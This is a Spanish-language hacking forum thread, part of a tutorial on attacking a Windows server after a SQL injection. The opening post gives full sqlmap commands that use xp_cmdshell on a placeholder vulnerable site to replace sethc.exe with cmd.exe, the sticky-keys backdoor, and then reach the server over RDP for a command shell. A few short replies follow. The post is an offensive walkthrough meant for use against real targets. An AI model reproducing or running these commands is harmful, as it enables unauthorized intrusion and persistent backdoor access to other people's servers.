Escalando privilegios en un servidor Windows desde una SQLi.

  • 3 Respuestas
  • 5027 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado m0rf30

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
En la parte anterior vimos lo siguiente:

     Exploit para MySQL vulnerable.
     Como saber los usuarios que hay en la base de datos en la que estamos trabajando con Sqlmap.
     Saber los privilegios de esos usuarios.
     Conocer que usuario somos en la base de datos.
     Averiguar si somos Administradores de la base de datos.

Continuemos.
Sabemos que somos un usuario con privilegios y que somos dba (data base admin).



 y que podemos ejecutar comandos con xp_cmdshell



omo podemos ver tiene abierto el puerto 3389 osea el puerto de administracion remota de windows

Ya sabemos que no podemos:

     Subir una webshell.
     Penetrar mediante Metasploit.



Entonces usemos nuestra imaginación de Hacker’s, pensemos que podemos hacer para poder explotar ese puerto y obtener acceso al servidor, tiene que ser algo que no implique exploits que inyecten código ya que no funciona (En este caso).



No se les ocurre nada??

Pues les mostrare una manera fácil y sencilla dado nuestro caso.

Aprovecharemos Sqlmap para entrar…, ¿¿sqlmap?? ¿¿Pero ya hicimos eso no??.

Pues si y no.
Realizamos el SQLi, pero ahora lo que haremos sera utilizar xp_cmdshell. Vamos.

Primero les enseñare algo que ocurre en el servidor.

En el sistema Windows cuando pulsas repetidas veces la tecla Shift o Mayus aparece un mensaje.

You are not allowed to view links. Register or Login

Presione Shift 5 veces seguidas



Ese es el archivo ejecutable que abre ese dialogo, entonces aprovecharemos eso para entrar al sevidor.

Vamos a la consola y con el comando

rdesktop IPdelServidor

Nos conectaremos a el mediante el puerto 3389.



y 5 Shift’s o Mayus despues…



Muy bien funciona como debería. Ahora a explotarlo >:}

Volvemos a Sqlmap y ejecutemos lo siguiente con xp_cmdshell:

Código: Text
  1. sqlmap -u http://www.sitiovulnerable.mx/login.asp –forms –dbms=MSSQL –user-agent=”Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)”  –level=5 –risk=3 –os-cmd=’Copy “c:\windows\system32\sethc.exe” “c:\windows\system32\sethc.zzz”‘

Copiara el archivo sethc.exe que esta en “C:/windows/system32/” a esa misma carpeta pero a un archivo llamado sethc.zzz veamos.



Muy bien ahora otro comando.

Código: Text
  1. sqlmap -u http://www.sitiovulnerable.mx/login.asp –forms –dbms=MSSQL –user-agent=”Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)”  –level=5 –risk=3 –os-cmd=’Copy “c:\windows\system32\cmd.exe” “c:\windows\system32\sethc.exe”‘
  2.  

 De nuevo expliquemos.

Código: Text
  1. –os-cmd=’Copy “c:\windows\system32\cmd.exe” “c:\windows\system32\sethc.exe”‘

Copiara de la carpeta “C://windows/system32/” el archivo cmd.exe a esa misma carpeta pero con el nombre sethc.exe ya entendieron
« Última modificación: Julio 18, 2016, 11:06:23 am por EPSILON »

Desconectado EPSILON

  • *
  • Ex-Staff
  • *****
  • Mensajes: 363
  • Actividad:
    0%
  • Country: 00
  • Reputación 0
  • [email protected]
  • Skype: epsilon.root1
    • Ver Perfil

Re:Realizando un ataque de sqli desde 0 parte 3

  • en: Julio 18, 2016, 10:56:13 am
@You are not allowed to view links. Register or Login edite el titulo de tus posts, porque no guardan una relacion directa como si fuesen un manual en pasos o paper.

Saludos!, EPSILON

Desconectado Script_23

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
Y si resulta que no eres usuario dba solo un usuario "normal", como seria para poder escalar a un usuario con priv  y poder acceder a las dbs restringidas??

Desconectado zoro248

  • *
  • Underc0der
  • Mensajes: 239
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
Muy buen tuto, aunque lo apropiado es que no se llamara "Escalacion de Privilegios", ya que el usuario en un principio es DBA y por ende ya tienes bastante ventaja


Saludos!

 

Configura un servidor SSH en Ubuntu para acceder a tu equipo de forma remota

Iniciado por 54NDR4

Respuestas: 2
Vistas: 4151
Último mensaje Abril 10, 2013, 04:11:48 pm
por Adastra
¿Como debo empezar para auditar un servidor web? - Nivel Intermedio

Iniciado por BrowserNet

Respuestas: 12
Vistas: 11971
Último mensaje Octubre 09, 2016, 02:24:36 am
por ceroMee
WhoUr herramienta para recopilar informacion de una web y buscar webs a vul sqli

Iniciado por jopcode

Respuestas: 0
Vistas: 3210
Último mensaje Noviembre 30, 2017, 10:57:00 pm
por jopcode
Crear nuestro servidor Onion en Kali Linux 2016

Iniciado por BrowserNet

Respuestas: 3
Vistas: 5101
Último mensaje Mayo 23, 2016, 03:13:26 pm
por baron.power
Instalar servidor proxy caché Squid en Ubuntu server

Iniciado por CodePunisher

Respuestas: 0
Vistas: 4454
Último mensaje Julio 25, 2013, 05:30:02 pm
por CodePunisher